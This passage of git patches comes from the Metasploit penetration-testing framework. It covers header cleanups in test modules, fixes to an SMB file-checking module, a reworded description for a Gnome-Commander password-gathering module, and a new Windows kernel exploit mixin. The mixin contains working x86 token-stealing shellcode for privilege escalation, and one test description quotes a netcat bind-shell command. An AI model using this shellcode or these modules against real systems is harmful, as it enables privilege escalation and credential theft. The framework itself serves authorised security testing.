-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
 ##
 
 require 'msf/core'
@@ -18,7 +12,6 @@ class Metasploit3 < Msf::Auxiliary
   def initialize
     super(
       'Name'	      => 'FTP Client Exploit Mixin DATA test Exploit',
-      'Version'      => '$Revision$',
       'Description'  => 'This module tests the "DATA" functionality of the ftp client exploit mixin.',
       'Author'	      => [ 'Thomas Ring', 'jduck' ],
       'License'      => MSF_LICENSE
diff --git a/test/modules/auxiliary/test/ip_spoof.rb b/test/modules/auxiliary/test/ip_spoof.rb
index 9cd164b8ee..828415f7a5 100644
--- a/test/modules/auxiliary/test/ip_spoof.rb
+++ b/test/modules/auxiliary/test/ip_spoof.rb
@@ -1,12 +1,6 @@
 ##
-# $Id$
-##
-
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
 ##
 
 
@@ -20,7 +14,6 @@ class Metasploit3 < Msf::Auxiliary
   def initialize
     super(
       'Name'        => 'Simple IP Spoofing Tester',
-      'Version'     => '$Revision$',
       'Description' => 'Simple IP Spoofing Tester',
       'Author'      => 'hdm',
       'License'     => MSF_LICENSE
diff --git a/test/modules/auxiliary/test/recon_passive.rb b/test/modules/auxiliary/test/recon_passive.rb
index 45f24575e4..cb6c08b441 100644
--- a/test/modules/auxiliary/test/recon_passive.rb
+++ b/test/modules/auxiliary/test/recon_passive.rb
@@ -1,12 +1,6 @@
 ##
-# $Id$
-##
-
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
 ##
 
 
@@ -21,7 +15,6 @@ class Metasploit3 < Msf::Auxiliary
   def initialize
     super(
       'Name'        => 'Simple Recon Module Tester',
-      'Version'     => '$Revision$',
       'Description' => 'Simple Recon Module Tester',
       'Author'      => 'hdm',
       'License'     => MSF_LICENSE,
diff --git a/test/modules/auxiliary/test/scanner_batch.rb b/test/modules/auxiliary/test/scanner_batch.rb
index f11d518158..a13e89855f 100644
--- a/test/modules/auxiliary/test/scanner_batch.rb
+++ b/test/modules/auxiliary/test/scanner_batch.rb
@@ -1,12 +1,6 @@
 ##
-# $Id$
-##
-
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
 ##
 
 
@@ -20,7 +14,6 @@ class Metasploit3 < Msf::Auxiliary
   def initialize
     super(
       'Name'        => 'Simple Recon Module Tester',
-      'Version'     => '$Revision$',
       'Description' => 'Simple Recon Module Tester',
       'Author'      => 'hdm',
       'License'     => MSF_LICENSE
diff --git a/test/modules/auxiliary/test/scanner_host.rb b/test/modules/auxiliary/test/scanner_host.rb
index 828e331162..dad516d738 100644
--- a/test/modules/auxiliary/test/scanner_host.rb
+++ b/test/modules/auxiliary/test/scanner_host.rb
@@ -1,12 +1,6 @@
 ##
-# $Id$
-##
-
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
 ##
 
 
@@ -20,7 +14,6 @@ class Metasploit3 < Msf::Auxiliary
   def initialize
     super(
       'Name'        => 'Simple Recon Module Tester',
-      'Version'     => '$Revision$',
       'Description' => 'Simple Recon Module Tester',
       'Author'      => 'hdm',
       'License'     => MSF_LICENSE
diff --git a/test/modules/auxiliary/test/scanner_range.rb b/test/modules/auxiliary/test/scanner_range.rb
index 59d5acfbf9..5392ee4384 100644
--- a/test/modules/auxiliary/test/scanner_range.rb
+++ b/test/modules/auxiliary/test/scanner_range.rb
@@ -1,12 +1,6 @@
 ##
-# $Id$
-##
-
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
 ##
 
 
@@ -20,7 +14,6 @@ class Metasploit3 < Msf::Auxiliary
   def initialize
     super(
       'Name'        => 'Simple Recon Module Tester',
-      'Version'     => '$Revision$',
       'Description' => 'Simple Recon Module Tester',
       'Author'      => 'hdm',
       'License'     => MSF_LICENSE
diff --git a/test/modules/auxiliary/test/space-check.rb b/test/modules/auxiliary/test/space-check.rb
index a8a632d686..d405e133d6 100644
--- a/test/modules/auxiliary/test/space-check.rb
+++ b/test/modules/auxiliary/test/space-check.rb
@@ -1,8 +1,6 @@
 ##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-#   http://metasploit.com/framework/
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
 ##
 
 require 'msf/core'
diff --git a/test/modules/exploits/test/aggressive.rb b/test/modules/exploits/test/aggressive.rb
index 28087e438e..5350f427f8 100644
--- a/test/modules/exploits/test/aggressive.rb
+++ b/test/modules/exploits/test/aggressive.rb
@@ -1,12 +1,6 @@
 ##
-# $Id$
-##
-
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
 ##
 
 require 'msf/core'
@@ -23,7 +17,6 @@ class Metasploit3 < Msf::Exploit::Remote
         "This module tests the exploitation of a test service.",
       'Author'         => 'skape',
       'License'        => MSF_LICENSE,
-      'Version'        => '$Revision$',
       'Arch'           => 'x86',
       'Payload'        =>
         {
diff --git a/test/modules/exploits/test/check.rb b/test/modules/exploits/test/check.rb
index 52d0e0c10f..9cb79007ef 100644
--- a/test/modules/exploits/test/check.rb
+++ b/test/modules/exploits/test/check.rb
@@ -1,8 +1,6 @@
 ##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-#   http://metasploit.com/framework/
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
 ##
 
 require 'msf/core'
diff --git a/test/modules/exploits/test/cmdweb.rb b/test/modules/exploits/test/cmdweb.rb
index 016d25834b..8ce45c3579 100644
--- a/test/modules/exploits/test/cmdweb.rb
+++ b/test/modules/exploits/test/cmdweb.rb
@@ -1,12 +1,6 @@
 ##
-# $Id$
-##
-
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
 ##
 
 require 'msf/core'
@@ -26,7 +20,6 @@ class Metasploit3 < Msf::Exploit::Remote
         on an Apache Tomcat server.
       },
       'Author'	=> 'bannedit',
-      'Version' => '$Revision$',
       'References' =>
         [
         ],
diff --git a/test/modules/exploits/test/dialup.rb b/test/modules/exploits/test/dialup.rb
index a4f9b6cb60..7532a48912 100644
--- a/test/modules/exploits/test/dialup.rb
+++ b/test/modules/exploits/test/dialup.rb
@@ -1,12 +1,6 @@
 ##
-# $Id$
-##
-
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
 ##
 
 require 'msf/core'
@@ -23,7 +17,6 @@ class Metasploit3 < Msf::Exploit::Remote
         This exploit connects to a system's modem over dialup and provides
         the user with a readout of the login banner.
       },
-      'Version'	=> '$Revision$',
       'Author'	=>
         [
           'I)ruid',
diff --git a/test/modules/exploits/test/egghunter.rb b/test/modules/exploits/test/egghunter.rb
index 8da86b65ad..2cb1cb7e36 100644
--- a/test/modules/exploits/test/egghunter.rb
+++ b/test/modules/exploits/test/egghunter.rb
@@ -1,12 +1,6 @@
 ##
-# $Id$
-##
-
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
 ##
 
 require 'msf/core'
@@ -24,7 +18,6 @@ class Metasploit3 < Msf::Exploit::Remote
         "This module tests the exploitation of a test service using the Egghunter.",
       'Author'         => 'jduck',
       'License'        => MSF_LICENSE,
-      'Version'        => '$Revision$',
       'Arch'           => ARCH_X86,
       'Payload'        =>
         {
diff --git a/test/modules/exploits/test/exploitme.rb b/test/modules/exploits/test/exploitme.rb
index a2b7b4411a..0b82943fed 100644
--- a/test/modules/exploits/test/exploitme.rb
+++ b/test/modules/exploits/test/exploitme.rb
@@ -1,12 +1,6 @@
 ##
-# $Id$
-##
-
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
 ##
 
 require 'msf/core'
@@ -22,7 +16,6 @@ class Metasploit3 < Msf::Exploit::Remote
       'Description'    => 'This module tests the exploitation of a test service',
       'Author'         => ['skape', 'Julien Tinnes <julien[at]cr0.org>'],
       'License'        => MSF_LICENSE,
-      'Version'        => '$Revision$',
       #'Arch'           => ARCH_MIPSBE,
       'Payload'        =>
         {
diff --git a/test/modules/exploits/test/java_tester.rb b/test/modules/exploits/test/java_tester.rb
index 464e3e938e..077239c030 100644
--- a/test/modules/exploits/test/java_tester.rb
+++ b/test/modules/exploits/test/java_tester.rb
@@ -1,12 +1,6 @@
 ##
-# $Id$
-##
-
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
 ##
 
 require 'msf/core'
@@ -21,7 +15,6 @@ class Metasploit3 < Msf::Exploit::Remote
       'Description'   => %q{ },
       'License'       => MSF_LICENSE,
       'Author'        => [ 'egypt' ],
-      'Version'       => '$Revision$',
       'References'    => [ ],
       'Platform'      => [ 'java', 'linux' ],
       'Arch'          => ARCH_JAVA,
diff --git a/test/modules/exploits/test/kernel.rb b/test/modules/exploits/test/kernel.rb
index 70b25dfd8c..bd27015ca7 100644
--- a/test/modules/exploits/test/kernel.rb
+++ b/test/modules/exploits/test/kernel.rb
@@ -1,12 +1,6 @@
 ##
-# $Id$
-##
-
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
 ##
 
 require 'msf/core'
@@ -27,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote
         "This module tests the exploitation of a kernel-mode test service.",
       'Author'         => 'skape',
       'License'        => MSF_LICENSE,
-      'Version'        => '$Revision$',
       'Arch'           => 'x86',
       'Payload'        =>
         {
diff --git a/test/modules/exploits/test/shell.rb b/test/modules/exploits/test/shell.rb
index 8cd284aa41..f47edd331a 100644
--- a/test/modules/exploits/test/shell.rb
+++ b/test/modules/exploits/test/shell.rb
@@ -1,12 +1,6 @@
 ##
-# $Id$
-##
-
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
 ##
 
 require 'msf/core'
@@ -24,7 +18,6 @@ class Metasploit3 < Msf::Exploit::Remote
         like: nc -l -p 31337 -e /bin/sh
       },
       'Author'	=> 'egypt',
-      'Version' => '$Revision$',
       'References' => [ ],
       'DefaultOptions' => { },
       'Payload' =>

From 04bf0b4ab693ac6dd9bc75823231fa893401d337 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 4 Aug 2014 11:34:12 -0500
Subject: [PATCH 227/321] Fix forgotten comma

---
 modules/auxiliary/admin/smb/check_dir_file.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/modules/auxiliary/admin/smb/check_dir_file.rb b/modules/auxiliary/admin/smb/check_dir_file.rb
index 60751723d9..bf2abe1cf3 100644
--- a/modules/auxiliary/admin/smb/check_dir_file.rb
+++ b/modules/auxiliary/admin/smb/check_dir_file.rb
@@ -43,8 +43,8 @@ class Metasploit3 < Msf::Auxiliary
     )
 
     register_options([
-      OptString.new('SMBSHARE', [true, 'The name of an accessible share on the server', 'C$'])
-      OptString.new('RPATH', [true, 'The name of the remote file/directory relative to the share']),
+      OptString.new('SMBSHARE', [true, 'The name of an accessible share on the server', 'C$']),
+      OptString.new('RPATH', [true, 'The name of the remote file/directory relative to the share'])
     ], self.class)
 
   end

From 1e29bef51bd03406533db20bee5a81b4ffe2836f Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 4 Aug 2014 11:46:27 -0500
Subject: [PATCH 228/321] Fix msftidy warnings

---
 modules/auxiliary/admin/smb/check_dir_file.rb | 24 ++++++++-----------
 1 file changed, 10 insertions(+), 14 deletions(-)

diff --git a/modules/auxiliary/admin/smb/check_dir_file.rb b/modules/auxiliary/admin/smb/check_dir_file.rb
index bf2abe1cf3..3d17662e4a 100644
--- a/modules/auxiliary/admin/smb/check_dir_file.rb
+++ b/modules/auxiliary/admin/smb/check_dir_file.rb
@@ -34,7 +34,7 @@ class Metasploit3 < Msf::Auxiliary
       'Author'      =>
         [
           'patrick',
-	  'j0hn__f'
+          'j0hn__f'
         ],
       'References'  =>
         [
@@ -50,26 +50,24 @@ class Metasploit3 < Msf::Auxiliary
   end
 
   def run_host(ip)
-
     vprint_status("Connecting to the server...")
 
     begin
-      connect()
-      smb_login()
+      connect
+      smb_login
 
       vprint_status("Mounting the remote share \\\\#{datastore['RHOST']}\\#{datastore['SMBSHARE']}'...")
       self.simple.connect("\\\\#{rhost}\\#{datastore['SMBSHARE']}")
       vprint_status("Checking for file/folder #{datastore['RPATH']}...")
 
       datastore['RPATH'].each_line do |path|
+        path.chomp!
 
         begin
-  
           if (fd = simple.open("\\#{path.chomp}", 'o')) # mode is open only - do not create/append/write etc
             print_good("File FOUND: \\\\#{rhost}\\#{datastore['SMBSHARE']}\\#{path}")
             fd.close
           end
-
         rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e
           case e.get_error(e.error_code)
           when "STATUS_FILE_IS_A_DIRECTORY"
@@ -91,14 +89,12 @@ class Metasploit3 < Msf::Auxiliary
           end
         end
       end #end do
-
-      rescue ::Rex::HostUnreachable
-        vprint_error("Host #{rhost} offline.")
-      rescue ::Rex::Proto::SMB::Exceptions::LoginError
-        print_error("Host #{rhost} login error.")
-      rescue ::Rex::ConnectionRefused 
-        print_error "Host #{rhost} unable to connect - connection refused" 
-
+    rescue ::Rex::HostUnreachable
+      vprint_error("Host #{rhost} offline.")
+    rescue ::Rex::Proto::SMB::Exceptions::LoginError
+      print_error("Host #{rhost} login error.")
+    rescue ::Rex::ConnectionRefused
+      print_error "Host #{rhost} unable to connect - connection refused"
     end # end begin
   end # end def
 end

From 85b5c5a691916d2eb06b665bfdc1fce73f9b2bdd Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 4 Aug 2014 11:48:13 -0500
Subject: [PATCH 229/321] Refactor check_path

---
 modules/auxiliary/admin/smb/check_dir_file.rb | 56 ++++++++++---------
 1 file changed, 29 insertions(+), 27 deletions(-)

diff --git a/modules/auxiliary/admin/smb/check_dir_file.rb b/modules/auxiliary/admin/smb/check_dir_file.rb
index 3d17662e4a..59d5f811dd 100644
--- a/modules/auxiliary/admin/smb/check_dir_file.rb
+++ b/modules/auxiliary/admin/smb/check_dir_file.rb
@@ -49,6 +49,34 @@ class Metasploit3 < Msf::Auxiliary
 
   end
 
+  def check_path(path)
+    begin
+      if (fd = simple.open("\\#{path}", 'o')) # mode is open only - do not create/append/write etc
+        print_good("File FOUND: \\\\#{rhost}\\#{datastore['SMBSHARE']}\\#{path}")
+        fd.close
+      end
+    rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e
+      case e.get_error(e.error_code)
+      when "STATUS_FILE_IS_A_DIRECTORY"
+        print_good("Directory FOUND: \\\\#{rhost}\\#{datastore['SMBSHARE']}\\#{path}")
+      when "STATUS_OBJECT_NAME_NOT_FOUND"
+        vprint_error("Object \\\\#{rhost}\\#{datastore['SMBSHARE']}\\#{path} NOT found!")
+      when "STATUS_OBJECT_PATH_NOT_FOUND"
+        vprint_error("Object PATH \\\\#{rhost}\\#{datastore['SMBSHARE']}\\#{path} NOT found!")
+      when "STATUS_ACCESS_DENIED"
+        vprint_error("Host #{rhost} reports access denied.")
+      when "STATUS_BAD_NETWORK_NAME"
+        vprint_error("Host #{rhost} is NOT connected to #{datastore['SMBDomain']}!")
+      when "STATUS_INSUFF_SERVER_RESOURCES"
+        vprint_error("Host #{rhost} rejected with insufficient resources!")
+      when "STATUS_OBJECT_NAME_INVALID"
+        vprint_error("opeining \\#{path} bad filename")
+      else
+        raise e
+      end
+    end
+  end
+
   def run_host(ip)
     vprint_status("Connecting to the server...")
 
@@ -61,33 +89,7 @@ class Metasploit3 < Msf::Auxiliary
       vprint_status("Checking for file/folder #{datastore['RPATH']}...")
 
       datastore['RPATH'].each_line do |path|
-        path.chomp!
-
-        begin
-          if (fd = simple.open("\\#{path.chomp}", 'o')) # mode is open only - do not create/append/write etc
-            print_good("File FOUND: \\\\#{rhost}\\#{datastore['SMBSHARE']}\\#{path}")
-            fd.close
-          end
-        rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e
-          case e.get_error(e.error_code)
-          when "STATUS_FILE_IS_A_DIRECTORY"
-            print_good("Directory FOUND: \\\\#{rhost}\\#{datastore['SMBSHARE']}\\#{path}")
-          when "STATUS_OBJECT_NAME_NOT_FOUND"
-            vprint_error("Object \\\\#{rhost}\\#{datastore['SMBSHARE']}\\#{path} NOT found!")
-          when "STATUS_OBJECT_PATH_NOT_FOUND"
-            vprint_error("Object PATH \\\\#{rhost}\\#{datastore['SMBSHARE']}\\#{path} NOT found!")
-          when "STATUS_ACCESS_DENIED"
-            vprint_error("Host #{rhost} reports access denied.")
-          when "STATUS_BAD_NETWORK_NAME"
-            vprint_error("Host #{rhost} is NOT connected to #{datastore['SMBDomain']}!")
-          when "STATUS_INSUFF_SERVER_RESOURCES"
-            vprint_error("Host #{rhost} rejected with insufficient resources!")
-          when "STATUS_OBJECT_NAME_INVALID"
-            vprint_error("opeining \\#{path} bad filename")
-          else
-            raise e
-          end
-        end
+        check_path(path.chomp)
       end #end do
     rescue ::Rex::HostUnreachable
       vprint_error("Host #{rhost} offline.")

From cd45ed0e0adcfefcc81a2aaaf00fb5885347f9e0 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 4 Aug 2014 11:54:30 -0500
Subject: [PATCH 230/321] Handle exceptions when connecting the SMBHSARE

---
 modules/auxiliary/admin/smb/check_dir_file.rb | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/modules/auxiliary/admin/smb/check_dir_file.rb b/modules/auxiliary/admin/smb/check_dir_file.rb
index 59d5f811dd..eb0a819372 100644
--- a/modules/auxiliary/admin/smb/check_dir_file.rb
+++ b/modules/auxiliary/admin/smb/check_dir_file.rb
@@ -97,6 +97,8 @@ class Metasploit3 < Msf::Auxiliary
       print_error("Host #{rhost} login error.")
     rescue ::Rex::ConnectionRefused
       print_error "Host #{rhost} unable to connect - connection refused"
+    rescue ::Rex::Proto::SMB::Exceptions::ErrorCode
+      print_error "Host #{rhost} unable to connect to share #{datastore['SMBSHARE']}"
     end # end begin
   end # end def
 end

From 4de59ad7d132bc512d9ecdc66cfd420f7e00cfd7 Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Mon, 4 Aug 2014 12:35:34 -0500
Subject: [PATCH 231/321] Add reasonable description for gnome-commander

---
 modules/post/linux/gather/gnome_commander_creds.rb | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)

diff --git a/modules/post/linux/gather/gnome_commander_creds.rb b/modules/post/linux/gather/gnome_commander_creds.rb
index c0191e9716..1739a15fb6 100644
--- a/modules/post/linux/gather/gnome_commander_creds.rb
+++ b/modules/post/linux/gather/gnome_commander_creds.rb
@@ -11,7 +11,10 @@ class Metasploit3 < Msf::Post
     super( update_info( info,
         'Name'          => 'Linux Gather Gnome-Commander Creds',
         'Description'   => %q{
-          Gnome-commander stores clear text passwords in ~/.gnome-commander/connections file.
+            This module collects the clear text passwords stored by
+          Gnome-commander, a GUI file explorer for GNOME.  Typically, these
+          passwords are stored in the user's home directory, at
+          ~/.gnome-commander/connections.
         },
         'License'       => MSF_LICENSE,
         'Author'        => [ 'David Bloom' ], # Twitter: @philophobia78

From 49837a3ba69a3818e5e37c72aa2f4ea60e93564c Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Tue, 22 Jul 2014 16:17:05 -0400
Subject: [PATCH 232/321] Create a basic WindowsKernel exploit mixin

---
 lib/msf/core/exploit/local/windows_kernel.rb | 113 +++++++++++++++++++
 1 file changed, 113 insertions(+)
 create mode 100644 lib/msf/core/exploit/local/windows_kernel.rb

diff --git a/lib/msf/core/exploit/local/windows_kernel.rb b/lib/msf/core/exploit/local/windows_kernel.rb
new file mode 100644
index 0000000000..8cdc7d88f2
--- /dev/null
+++ b/lib/msf/core/exploit/local/windows_kernel.rb
@@ -0,0 +1,113 @@
+# -*- coding: binary -*-
+
+module Msf
+module Exploit::Local::WindowsKernel
+
+  #
+  # Find the address of nt!HalDispatchTable.
+  #
+  # @return [Integer] The address of nt!HalDispatchTable.
+  #
+  def find_haldispatchtable
+    kernel_info = find_sys_base(nil)
+    vprint_status("Kernel Base Address: 0x#{kernel_info[0].to_s(16)}")
+
+    hKernel = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1)
+    if hKernel['return'] == 0
+      print_error("Failed to load #{kernel_info[1]} (error: #{hKernel['GetLastError']})")
+      return nil
+    end
+    hKernel = hKernel['return']
+
+    halDispatchTable = session.railgun.kernel32.GetProcAddress(hKernel, "HalDispatchTable")
+    if halDispatchTable['return'] == 0
+      print_error("Failed to retrieve the address of HalDispatchTable (error: #{halDispatchTable['GetLastError']})")
+      return nil
+    end
+    halDispatchTable = halDispatchTable['return']
+
+    halDispatchTable -= hKernel
+    halDispatchTable += kernel_info[0]
+    vprint_status("HalDisPatchTable Address: 0x#{halDispatchTable.to_s(16)}")
+    halDispatchTable
+  end
+
+  #
+  # Find the load address for a device driver on the session.
+  #
+  # @param drvname [String, nil] The name of the module to find, otherwise the kernel
+  #   if this value is nil.
+  #
+  # @return [Array, nil] An array containing the base address and the located drivers name.
+  #
+  def find_sys_base(drvname)
+    unless session.railgun.dlls.keys.include?('psapi')
+      session.railgun.add_dll('psapi')
+      session.railgun.add_function(
+        'psapi',
+        'EnumDeviceDrivers',
+        'BOOL',
+        [
+          ["PBLOB", "lpImageBase", "out"],
+          ["DWORD", "cb", "in"],
+          ["PDWORD", "lpcbNeeded", "out"]
+        ])
+      session.railgun.add_function(
+        'psapi',
+        'GetDeviceDriverBaseNameA',
+        'DWORD',
+        [
+          ["LPVOID", "ImageBase", "in"],
+          ["PBLOB", "lpBaseName", "out"],
+          ["DWORD", "nSize", "in"]
+        ])
+    end
+
+    results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4)
+    addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack("V*")
+
+    addresses.each do |address|
+      results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48)
+      current_drvname = results['lpBaseName'][0..results['return'] - 1]
+      if drvname == nil
+        if current_drvname.downcase.include?('krnl')
+          return [address, current_drvname]
+        end
+      elsif drvname == current_drvname
+        return [address, current_drvname]
+      end
+    end
+  end
+
+  #
+  # Generate x86 token stealing shellcode suitable for use when overwriting the
+  # halDispatchTable+0x4.
+  #
+  # @param target [Hash] The target information containing the offsets to _KPROCESS,
+  #   _TOKEN, _UPID and _APLINKS.
+  #
+  # @return [String] The token stealing shellcode.
+  #
+  def token_stealing_shellcode_x86(target)
+    tokenstealing =  "\x52"                                                        # push edx                         # Save edx on the stack
+    tokenstealing << "\x53"                                                        # push ebx                         # Save ebx on the stack
+    tokenstealing << "\x33\xc0"                                                    # xor eax, eax                     # eax = 0
+    tokenstealing << "\x64\x8b\x80\x24\x01\x00\x00"                                # mov eax, dword ptr fs:[eax+124h] # Retrieve ETHREAD
+    tokenstealing << "\x8b\x40" + target['_KPROCESS']                              # mov eax, dword ptr [eax+44h]     # Retrieve _KPROCESS
+    tokenstealing << "\x8b\xc8"                                                    # mov ecx, eax
+    tokenstealing << "\x8b\x98" + target['_TOKEN'] + "\x00\x00\x00"                # mov ebx, dword ptr [eax+0C8h]    # Retrieves TOKEN
+    tokenstealing << "\x8b\x80" + target['_APLINKS'] + "\x00\x00\x00"              # mov eax, dword ptr [eax+88h]  <====| # Retrieve FLINK from ActiveProcessLinks
+    tokenstealing << "\x81\xe8" + target['_APLINKS'] + "\x00\x00\x00"              # sub eax,88h                        | # Retrieve _EPROCESS Pointer from the ActiveProcessLinks
+    tokenstealing << "\x81\xb8" + target['_UPID'] + "\x00\x00\x00\x04\x00\x00\x00" # cmp dword ptr [eax+84h], 4         | # Compares UniqueProcessId with 4 (The System Process on Windows XP)
+    tokenstealing << "\x75\xe8"                                                    # jne 0000101e ======================
+    tokenstealing << "\x8b\x90" + target['_TOKEN'] + "\x00\x00\x00"                # mov edx,dword ptr [eax+0C8h]     # Retrieves TOKEN and stores on EDX
+    tokenstealing << "\x8b\xc1"                                                    # mov eax, ecx                     # Retrieves KPROCESS stored on ECX
+    tokenstealing << "\x89\x90" + target['_TOKEN'] + "\x00\x00\x00"                # mov dword ptr [eax+0C8h],edx     # Overwrites the TOKEN for the current KPROCESS
+    tokenstealing << "\x5b"                                                        # pop ebx                          # Restores ebx
+    tokenstealing << "\x5a"                                                        # pop edx                          # Restores edx
+    tokenstealing << "\xc2\x10"                                                    # ret 10h                          # Away from the kernel!
+    tokenstealing
+  end
+
+end
+end

From 43a5120696e69264191c47a442ea9dc5bf20f56d Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Sat, 2 Aug 2014 08:08:59 -0700
Subject: [PATCH 233/321] Cleanup the WindowsKernel mixin

---
 lib/msf/core/exploit/local/windows_kernel.rb | 45 ++++++++++----------
 1 file changed, 22 insertions(+), 23 deletions(-)

diff --git a/lib/msf/core/exploit/local/windows_kernel.rb b/lib/msf/core/exploit/local/windows_kernel.rb
index 8cdc7d88f2..5c5664d544 100644
--- a/lib/msf/core/exploit/local/windows_kernel.rb
+++ b/lib/msf/core/exploit/local/windows_kernel.rb
@@ -2,7 +2,6 @@
 
 module Msf
 module Exploit::Local::WindowsKernel
-
   #
   # Find the address of nt!HalDispatchTable.
   #
@@ -12,24 +11,24 @@ module Exploit::Local::WindowsKernel
     kernel_info = find_sys_base(nil)
     vprint_status("Kernel Base Address: 0x#{kernel_info[0].to_s(16)}")
 
-    hKernel = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1)
-    if hKernel['return'] == 0
-      print_error("Failed to load #{kernel_info[1]} (error: #{hKernel['GetLastError']})")
+    h_kernel = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1)
+    if h_kernel['return'] == 0
+      print_error("Failed to load #{kernel_info[1]} (error: #{h_kernel['GetLastError']})")
       return nil
     end
-    hKernel = hKernel['return']
+    h_kernel = h_kernel['return']
 
-    halDispatchTable = session.railgun.kernel32.GetProcAddress(hKernel, "HalDispatchTable")
-    if halDispatchTable['return'] == 0
-      print_error("Failed to retrieve the address of HalDispatchTable (error: #{halDispatchTable['GetLastError']})")
+    hal_dispatch_table = session.railgun.kernel32.GetProcAddress(h_kernel, 'HalDispatchTable')
+    if hal_dispatch_table['return'] == 0
+      print_error("Failed to retrieve the address of nt!HalDispatchTable (error: #{hal_dispatch_table['GetLastError']})")
       return nil
     end
-    halDispatchTable = halDispatchTable['return']
+    hal_dispatch_table = hal_dispatch_table['return']
 
-    halDispatchTable -= hKernel
-    halDispatchTable += kernel_info[0]
-    vprint_status("HalDisPatchTable Address: 0x#{halDispatchTable.to_s(16)}")
-    halDispatchTable
+    hal_dispatch_table -= h_kernel
+    hal_dispatch_table += kernel_info[0]
